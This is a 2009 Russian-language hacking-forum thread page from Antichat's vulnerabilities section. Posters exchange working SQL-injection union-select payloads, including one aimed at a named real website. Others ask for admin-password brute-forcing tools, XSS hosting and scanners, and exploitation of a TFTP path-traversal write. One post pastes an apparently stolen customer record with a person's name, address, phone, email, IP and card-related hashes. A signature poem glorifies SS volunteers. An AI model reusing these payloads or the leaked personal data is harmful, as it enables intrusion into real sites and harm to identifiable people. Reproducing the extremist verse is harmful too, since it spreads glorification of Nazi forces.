ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #10281  
Старый 18.11.2009, 21:04
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию

Цитата:
Сообщение от fng  
вообще там бред какой-то
поля получается перебирать все из information_schema, а просто по таблицам нет O_o

т.е. я делал выборку из таблицы columns, но лимит срабатывал только когда в выборке участвовало поле column_name

есть у кого предположения почему там так?
Я не понял что у тебя срабатывает, что не срабатывает. Самая заурядная скуля

-36))+union+select+1,2,3,4,unhex(hex(group_concat(t able_name))),6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3 ,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,1+from+info rmation_schema.columns+where+column_name+like+0x25 757365726e616d6525--+
-36))+union+select+1,2,3,4,5,unhex(hex(group_concat (column_name))),7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2, 3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,1+from+inf ormation_schema.columns+where+table_name=0x6578707 45f75736572--+
-36))+union+select+1,2,3,4,unhex(hex(username)),6,7 ,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10, 1,2,3,4,5,6,7,8,9,10,1,1+from+expt_user+limit+0,1--+
 

  #10282  
Старый 19.11.2009, 07:35
YuNi|[c
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476

Репутация: 66
По умолчанию

нашел директорию админки, кто нит знает онлайн утилиты для брута пасса http html form?
 

  #10283  
Старый 19.11.2009, 07:46
DeluxeS
Участник форума
Регистрация: 01.08.2009
Сообщений: 183
Провел на форуме:
1483264

Репутация: 131
По умолчанию

Цитата:
Сообщение от YuNi|[c  
нашел директорию админки, кто нит знает онлайн утилиты для брута пасса http html form?
https://forum.antichat.net/thread109600.html
 

  #10284  
Старый 19.11.2009, 15:05
wolmer
Постоянный
Регистрация: 12.05.2009
Сообщений: 395
Провел на форуме:
4761503

Репутация: 229
По умолчанию

Дайте пожалуйста ответ по этой теме:http://forum.antichat.ru/thread155501.html
 

  #10285  
Старый 19.11.2009, 16:40
2Fed123
Познающий
Регистрация: 26.02.2009
Сообщений: 65
Провел на форуме:
226426

Репутация: 5
Отправить сообщение для 2Fed123 с помощью ICQ
По умолчанию

Код:
(0000000039, 'jeffery', 'brown', 'pyramid lock', 'pyramidlock@hotmail.com', '26434 lorenz', '', 'madison heights', 'mi', '48071', 'US', '248-837-9605', 'uKrNsZydbo8=', '0.00', '', '2008-10-18', '', 0, 'MasterCard', 0xad0dcd773619ed1d768fbeb219b14c3a0a23595ef189088ac8ba3ce3a5001944, 0x0a23595ef189088ac8ba3ce3a5001944, 0x5ea4b9f8995d33027b5f3e4b154e8d54, 0x0a23595ef189088ac8ba3ce3a5001944, '2009-09-15 19:05:24', '68.43.87.206', 'c-68-43-87-206.hsd1.mi.comcast.net', 'Active', ''),
В чем это зашифровано?
Код:
0x5ea4b9f8995d33027b5f3e4b154e8d54
Пробовал как Hex неполучается
 

  #10286  
Старый 19.11.2009, 17:09
L I G A
Постоянный
Регистрация: 27.07.2008
Сообщений: 614
Провел на форуме:
4532332

Репутация: 1196


Отправить сообщение для L I G A с помощью ICQ
По умолчанию

Цитата:
В чем это зашифровано?
Код:
0x5ea4b9f8995d33027b5f3e4b154e8d54
Пробовал как Hex неполучается
если я не ошибаюсь 0x+md5(), т.к.:
strlen(5ea4b9f8995d33027b5f3e4b154e8d54)=32;
&
[a-f0-9]
 

  #10287  
Старый 20.11.2009, 01:23
Axelhack
Новичок
Регистрация: 19.11.2009
Сообщений: 1
Провел на форуме:
6510

Репутация: 0
Question

Всем привет,

2 вопроса

1. Бесплатный хостинг для XSS и
2. сканер XSS багов на сайте.

Прошу помочь. Благодарен Axelhack.
 

  #10288  
Старый 20.11.2009, 07:44
p.r0phe.t
Познающий
Регистрация: 22.08.2009
Сообщений: 98
Провел на форуме:
224604

Репутация: 19
По умолчанию

Подскажите, сканер выплюнул:

С помощью команды "PUT /../../../../roellibu.txt" существует возможность записывать любые файлы в произвольное место на диске.

В сервисе TFTP на 69 udp порту. Впервые такую фичу фичу вижу,объясните как реализовывать?
ФТП может висеть на удп? если да,то как приконектиться?

Последний раз редактировалось p.r0phe.t; 20.11.2009 в 07:56..
 

  #10289  
Старый 20.11.2009, 10:21
Nosfer
Новичок
Регистрация: 10.01.2007
Сообщений: 16
Провел на форуме:
109680

Репутация: 2
По умолчанию

кто может подсказать по скуле в
http://www.pngbd.com/photos/showgallery.php?cat=1'
Никак не выходит, толи поля не подпираются, толи фильтр какой-то
 

  #10290  
Старый 20.11.2009, 10:26
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию

тебе там подвох, что в ошибке не показывает запрос ((и это не есть гуд
почему я подумал про скобку )))


http://www.pngbd.com/photos/showgallery.php?cat=1')+UNION+SELECT+1,version(),3 ,4%23
__________________
В сырых могилах Второй Мировой
Солдатам снятся цветные сны.
Их кости порой видны под первой травой,
Когда сойдет снег в начале весны.
Славяне тоже сражались в отрядах СС
За чистоту арийской крови.
Теперь они дремлют за чертою небес,
Но снова встанут на бой, лишь позови.
 
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ